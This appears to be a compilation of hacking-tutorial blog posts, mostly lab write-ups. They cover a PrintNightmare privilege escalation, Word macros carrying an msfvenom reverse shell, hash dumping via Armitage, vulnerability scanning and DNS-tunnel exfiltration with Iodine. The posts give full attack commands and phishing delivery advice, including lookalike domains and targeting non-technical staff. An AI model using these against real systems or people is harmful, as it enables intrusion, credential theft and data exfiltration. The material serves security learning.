PrintNightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the PrintNightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021-1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is PrintNightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, implementing other measures such as restricting access to the Spooler service and disabling it on systems.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
PrintNightmare impacket-rpcdump

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publically available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25--  https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’

CVE-2021-1675.ps1.1                     100%[============================================================================>] 174.38K  --.-KB/s    in 0.03s   
2023-03-17 18:04:26 (4.96 MB/s) - ‘CVE-2021-1675.ps1.1’ saved [178561/178561]
Wget CVE-2021-1675

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
PrintNightmare Evil-WinRM

The Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021-1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type 
[+] Dll-Loader 
[+] Donut-Loader 
[+] field 
[+] func 
[+] get_nightmare_dll 
[+] Invoke-Binary 
[+] Invoke-Nightmare 
[+] New-InMemoryModule 
[+] psenum 
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PrintNightmare Invoke-Nightmare

The Consequence

We are now able to remote the target system with the new user. As you can see from the output below, the new user is a member of the local administrator’s group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents> 
Game Over

PrintNightmare Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Making Malicious Microsoft Office Files For Hacking

Hello world and welcome to HaXeZ, in this post I’m going to be explaining how you can hack anyone with a Microsoft Office Document. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.

Microsoft Office Visual Basic

Microsoft Office applications have a feature that allows them to support Visual Basic programs or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the view tab and click on Macros, then view Macros.

Microsoft Office Visual Basic
Microsoft Office Visual Basic

Creating A Macro In Microsoft Office

With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.

Creating A Macro In Microsoft Office
Creating A Macro In Microsoft Office

A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.

Sub THM()
  MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Visual Basic Script
Visual Basic Script

Running the Microsoft Office Macro

Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.

Running the Macro
Running the Macro

Automatic Macro Execution (sort of)

We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and Auto_Open functions. You also need to specify which function to execute, in our case it is the EvilMacro function. The code will look similar to the snippet below.

Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

Sub EvilMacro()
   MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Automatic Macro Execution (sort of)
Automatic Macro Execution (sort of)

In order for the macro to work, it needs to be saved in a Macro-Enabled format such as .doc and docm. To do this, save the document as a Word 97-2003 Template. Got to File, save Document1 and save as type Word 97-2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.

Popping Programs with Microsoft Office

That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.

Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

Sub EvilMacro()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub
Popping Programs in Microsoft Office
Popping Programs

Injecting Some Venom

With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.

Firstly, we need to create a Macro payload to add to our Microsoft Word Document, this can be done using the following msfvenom command and replacing the X’s with your attack boxes IP address and desired port:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X -f vba

Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97-2003 Document.

Injecting Some Venom in to Microsoft Office
Injecting Some Venom

Catching The Reverse Shell

The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.

Catching The Reverse Shell
Catching The Reverse Shell
Exploit Complete
Exploit Complete

Triggering The Payload

When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.

Triggering The Microsoft Office Payload
Triggering The Microsoft Office Payload

Microsoft Office Delivery Methods

The are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success will likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.

USB Delivery

USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.

Web Delivery

Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done but web delivery gives you more flexibility. The victim need only down the file and open it.

Email Delivery

Email delivery is a great option for a delivery technique provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For explain, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected]. Granted it stands out but there are more sneaky ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.

Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.

Conclusion

Ok, the title of this post was clickbait and for that, I apologize. Granted the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such as way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.

Dumping Windows NTLM Password Hashes With Armitage C2

Hello world and welcome to HaXeZ, in this post I’m going to explain how to dump NTLM hashes using Armitage. Armitage, (created by Raphael Mudge) is a C2 or command and control application that provides a GUI for Metasploit. Furthermore, it allows for the creation of team servers which allows for multiple users to interact with the same workspace. I decided to make this post due to the difficulties I had with the Introduction to C2 room on TryHackMe.

Setting Up Armitage

First, we need to set up Armitage. In order to do this, we need to clone the GitLab repository found here. Next, we need to run the package.sh script to set it up. Once the setup is complete, we need to start Postgresql.

systemctl start postgresql

Once Postgresql is up and running, we need to drop the existing Metasploit database and initialize a new one. This can be achieved by running the msfdb delete and msfdb init commands as shown below. Please be advised that the screenshots are from the attack box on TryHackMe.

Setting Up Armitage
Setting Up Armitage

Creating Armitage Team Server

While this isn’t entirely necessary, we will next use the teamserver binary located at /opt/armitage/releases/unix to create a teamserver. In order to create the teamserver, we need to run the binary followed by our IP and password. The IP is your eth0 IP and the password is anything you want it to be.

./teamserver <YOUR-IP> <YOUR-PASSWORD>
Creating Armitage Team Server
Creating Armitage Team Server

Starting Armitage

Next, we need to start the C2 or Command and Control application itself. In order to this we need to run the Armitage binary from the /opt/armitage/releases/unix directory. No other arguments are needed, just punch it into the CLI and wait for the window.

Starting Armitage
Starting Armitage

Connecting

Once you run the binary, a window will pop up. Using the information from the teamserver CLI, populate the required information. The application will then attempt to connect to the Postgresql database with the supplied credentials (you remember your password right). The reason we need to connect to the database is that Armitage heavily relies on the Metasploit database.

Connecting
Connecting

Armitage Nickname

This is by far the most important part of any engagement. Whether it’s Red Teaming, Hacking, or Penetration Testing. Having an awesome hacker handle is crucial to success and without it, you will be doomed to fail. Ok, maybe not but this is the part where you need to choose your username. This is the username that your Armitage teammates will see you as so choose something incredibly cringy and embarrassing.

Nickname
Nickname

Add The Target

In order to dump those precious hashes, you need a target. Again, I’m following the TryHackMe Introduction to C2 room. The target of my nefarious hacking activities will be the box named Blue which is vulnerable to Eternal Blue. In order to add the host, click hosts and click add hosts. You will then be presented with a window similar to the one below. Punch in the IP address and click ok.

Add The Target
Add The Target

Exploiting The Target

In order to exploit the target, we need to locate the Eternal Blue exploit from the menu. Under Exploit, Windows, SMB, grab the ms17_010_eternal exploit and drag it over the target. The exploit you need to use will depend entirely on the target you want to attack. I’m using Blue as the target because it is an easy machine to hack. Believe it or not, Blue loves being hacked.

Exploiting The Target
Exploiting The Target

Configuring The Payload

Funnily enough, you don’t actually need to do anything to configure the payload. This section of the article is a complete waste of space. Leave the settings as default and click launch. The only reason this section of the article exists is that I took a screenshot. So yeah, drag the payload over the host. Don’t change the settings. Click launch.

Configuring The Payload
Configuring The Payload

Shell To Meterpreter

If you successfully exploited the target, you should have some lovely ASCII showing WIN (provided you’re exploiting Blue). That’s fantastic, however, it isn’t. You have managed to get yourself a standard shell as NT AUTHORITY. Don’t get me wrong, this shell is good for most things but let’s face it, we want a Meterpreter shell. Well, there is an easy way to upgrade to a Meterpreter shell. Just use the search box for shell_to_meterpreter and drag it onto the host. This should spawn a new Meterpreter shell.

Shell To Meterpreter
Shell To Meterpreter

Migrate To Exfiltrate

You now have your Meterpreter session open and sure you can attempt to dump hashes now. However, if you do, you will likely not get all the user’s hashes. At least that was my experience when attempting to dump Ted’s hash on the TryHackMe room. In order to dump Ted’s hash, we need to migrate our process. There are arguments to be made about which process to migrate to. Migrating to certain processes will be a lot more stealthy. This is something I intend to cover in future posts. However, for now, migrate to the lsass.exe process. This will give you the access required to dump the hashes. If you’re wondering how to do this then right-click the host, select Meterpreter, select Explore, then select show process. The rest is fairly straightforward.

Migrate To Exfiltrate
Migrate To Exfiltrate

Dump Those Hashes

Finally, we are ready to dump the hashes. In order to get that elusive hash of Ted, all we need to do is click Meterpreter, Access, and Dump Hashes. You will get a number of methods, the method I chose was the Lsass method. This worked straight away and dumped Teds hash to the terminal as you can see below. Granted, we already had the administrator hash was already ours but it’s annoying not hacking everyone isn’t it?

Dump Those Hashes
Dump Those Hashes

Conclusions

Ok, I may have gone a bit overboard on the graphics. I’m also sure that this write-up is full of spelling mistakes and graphical errors. If you can forgive that, then I hope this has helped you solve the TryHackMe introduction to C2 room. I will admit that I struggled with this room having never used Armitage before. I could have rinsed it using Metasploit but that wasn’t the point of the room. God knows how long I tried to set up Armitage on my Kali virtual machine. I eventually gave up and used the TryHackMe attack box. As for Armitage itself, it could THM attack box but I thought it was slower than using Metasploit. Anyway, I had a lot of fun with this one. Big thanks to Rummy for helping out.

Hack To Learn: Vulnerability Scanning

Hello World and welcome to HaXeZ, today I’m going to be covering Vulnerability Scanning. This post is continuing the Hack To Learn series where I cover the basics of the different phases of hacking or penetration testing. So far we have covered Environment Setup, Hacking Legally, and Open Source Intelligence Gathering.

Vulnerability Scanning

Once you have completed the open source intelligence gathering phase, it’s time to start looking for vulnerabilities. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.

Nmap Vulnerability Scanning

If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.

The image below shows the output of a Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions and ‘-p0-‘ for all ports. Next, I specified the ‘–script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and the ‘-T5’ to speed it up.

This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.

sudo nmap -g 53 -f -sV -p0- -O --script vuln,auth,exploit 10.0.2.5 -T5
Nmap Vulnerability Scanning
Nmap Vulnerability Scanning

Nessus Vulnerability Scanning

Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an essential version for you to play around and I highly recommend giving it a go. However, the professional version has many more cool toys.

The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0-65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).

Nessus Vulnerability Scanning
Nessus Vulnerability Scanning

Nikto Web Application Scanning

Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even though it doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.

Nikto
Nikto

Burp Suite Web Application Scanning

No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.

Burp Suite
Burp Suite

Conclusions

I know I have only scraped the surface on the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP Zap. I’m not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn’t command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.

Data Exfiltration, Firewall Evasion, and DNS Encapsulation with Iodine

Hello World and welcome to HaXeZ. Today I want to talk about the DNS tunneling software Iodine.  Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

My Current IP Address before Iodine
My Current IP Address before Iodine

Iodine Domain Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine DNS Records
Iodine DNS Records

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Set Up
Iodine Server Set Up

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Checking Iodine Server Configuration
Checking Iodine Server Configuration

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one. 

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Set Up
Iodine Client Set Up

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected] 

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Browser Proxy Settings
Browser Proxy Settings
What is my IP showing the IP of the server
What is my IP showing the IP of the server

Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

Exploiting Buffer Overflows on TryHackMe

Hello World, and welcome to HaXeZ. Today I want to talk about Buffer Overflows. I’ve struggled with Buffer Overflows for a long time. In other words, I understood the concept but always had trouble applying it practically. Recently I have buried my head in the sand and have just sunk hours into TryHackMe. I came across the buffer overflows learning path and finally understand so now I’m bringing you this article.

Buffer Overflows Setup

The First thing we need to do is to head to TryHackMe and head to the Buffer Overflows Prep room. You can find the room here. Next, we need to spawn the machine and grab the IP address. You can then remote desktop from your Linux virtual machine to the new IP address using Remmina.

Setting Up Immunity

Once connected via RDP to the Windows Machine, launch Immunity as an Administrator and configure Mona using the following command.

"!mona config -set workingfolder c:\mona\%p"
Configuring Mona On Immunity Debugger
